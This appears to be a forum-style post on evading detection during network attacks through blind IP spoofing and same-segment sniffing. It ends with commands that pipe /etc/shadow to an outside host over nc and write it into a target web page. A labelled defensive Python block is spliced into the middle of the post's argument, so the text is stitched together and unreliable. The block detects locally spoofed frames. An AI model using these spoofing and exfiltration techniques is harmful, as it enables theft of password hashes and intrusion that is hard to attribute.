So let's look at the realities of being covert: not really "doable" per se, but accomplishable. To understand being, and remaining, covert, you need to understand networking for the technical problems, and common sense from the penetration testing "I need to get this done" side.
In order not to "get flagged/caught," you need to know that unless you blindly spoof with 100% assurance that your exploit will work on the other side, it's a very difficult, almost impossible, task to remain 100% invisible.
As many will know, when you spoof tcp/udp/icmp/ip as a whole, you can never see the return information. You were never, and will never be, the intended recipient. So this is what occurs, for those who are unfamiliar with it:
Me [10.10.10.1] --> attack target [10.20.30.1] : pretend to be someone else [10.25.50.1]
I can perform this all day long and any responses will look like the following to some degree:
attack target's log: 10.25.50.1 DID_SOMETHING ... respond to 10.25.50.1
I can never see the return data going back and forth in that stream unless I am on the 10.25.50.x or the 10.20.30.x network.
Now let's suppose that I had an account somewhere on any one of these networks. Say, 10.20.30.2. Imagine this was an open network in a park somewhere.
Me:[on a shell at 10.20.30.2] --> attack target [10.20.30.1] : pretend to be someone else [10.25.50.1]
Since I'm on the network, I can turn on a sniffer and, depending on how the network is configured, I can see those two hosts responding to one another. (If VLANs aren't properly configured, if I MITMed the router, etc.)
So a potential attack:
Me:[on a shell at 10.20.30.2] --> attack target [10.20.30.1] --> pretend to be 10.25.50.1 && tcpdump 'ip host 10.20.30.2' -C 1024 -i eth??
This will allow me to see what transpires during this attack. So what can I do? I can blindly spoof, say, an exploit as someone else and watch the sniffer output on the way back and forth. If I see via sniffing that the exploit was successful, I know I can continue blindly spoofing to my heart's content. Because I am not visible, even if detected, I am never blocked; someone else is. Also, I'd positively know that my exploit worked, so any other host I choose to use is successful. On the way back out, I can create reverse connections in the same manner (blindly going on, knowing I will successfully get out).
Without getting into too much detail about programs or specific commands, imagine me sending a raw nc out ANYWHERE:
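From the defender's side, the traffic in the scenario above has a tell on the 10.20.30.x segment: a frame carrying an off-segment source IP that did not arrive from the router's MAC must have been crafted on-link. The following is an added example, not code from the original post, that checks constructed tcpdump -e style lines for that condition (the segment prefix, gateway MAC and all addresses are assumed):

```python
import ipaddress
import re

# Constructed tcpdump -e style lines (not a real capture). The first two are
# normal: 10.20.30.2 talking to the gateway, and a genuine 10.25.50.1 packet
# arriving through the router. The third carries an off-segment source IP but
# the source MAC of the local host at 10.20.30.2, i.e. it was spoofed locally.
SAMPLE_LINES = [
    "12:00:01.000000 aa:bb:cc:00:00:02 > aa:bb:cc:00:00:ff, ethertype IPv4 (0x0800), length 74: 10.20.30.2.51000 > 10.20.30.1.22: Flags [S], seq 1",
    "12:00:02.000000 aa:bb:cc:00:00:ff > aa:bb:cc:00:00:01, ethertype IPv4 (0x0800), length 74: 10.25.50.1.40000 > 10.20.30.1.22: Flags [S], seq 2",
    "12:00:03.000000 aa:bb:cc:00:00:02 > aa:bb:cc:00:00:01, ethertype IPv4 (0x0800), length 74: 10.25.50.1.40001 > 10.20.30.1.22: Flags [S], seq 3",
]

LOCAL_NET = ipaddress.ip_network("10.20.30.0/24")   # assumed segment prefix
GATEWAY_MAC = "aa:bb:cc:00:00:ff"                    # assumed router MAC

LINE_RE = re.compile(
    r"^(?P<ts>\S+) (?P<smac>[0-9a-f:]{17}) > (?P<dmac>[0-9a-f:]{17}), "
    r"ethertype IPv4 .*?: (?P<sip>\d+\.\d+\.\d+\.\d+)\.\d+ > (?P<dip>\d+\.\d+\.\d+\.\d+)\.\d+:"
)

def parse_line(line):
    """Return (ts, src_mac, src_ip, dst_ip), or None for lines that don't parse."""
    m = LINE_RE.match(line)
    if not m:
        return None
    return m["ts"], m["smac"], ipaddress.ip_address(m["sip"]), ipaddress.ip_address(m["dip"])

def find_local_spoofs(lines, local_net=LOCAL_NET, gateway_mac=GATEWAY_MAC):
    """Flag frames whose IP source is outside the segment but whose L2 source
    is not the gateway: such a packet could only have been crafted on-link."""
    alerts = []
    for line in lines:
        parsed = parse_line(line)
        if parsed is None:
            continue
        ts, smac, sip, dip = parsed
        if sip not in local_net and smac.lower() != gateway_mac.lower():
            alerts.append({"ts": ts, "src_mac": smac, "src_ip": str(sip), "dst_ip": str(dip)})
    return alerts

if __name__ == "__main__":
    for a in find_local_spoofs(SAMPLE_LINES):
        print(f"{a['ts']} spoofed source {a['src_ip']} from local MAC {a['src_mac']} -> {a['dst_ip']}")
```

A spoofed frame can forge its source MAC as well, so treat a hit as a lead rather than proof, and pair this with BCP38-style egress filtering on the router so off-prefix sources never leave the segment.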
more /etc/shadow | nc google.com 80
Makes no sense, eh? Why not? If I'm sniffing on the network, I get to see the output. Obviously google.com has nothing to do with the shadow file, so there is no target to attribute the attack to, and I still get what I needed.
more /etc/shadow | sed 's:^:<\!--:g;s:$:-->:g' >> /path/to/target/webserver/index.html
Now the output of the shadow file is an HTML comment inside a webpage. You can use a proxy to view the webpage. There are a lot of ways to be covert; BOSH is also good for stuff like this. So it's not about "not being detected," as that is difficult. You will either need to blend in with the crowd, or use blind spoofing plus creativity to overcome being blocked.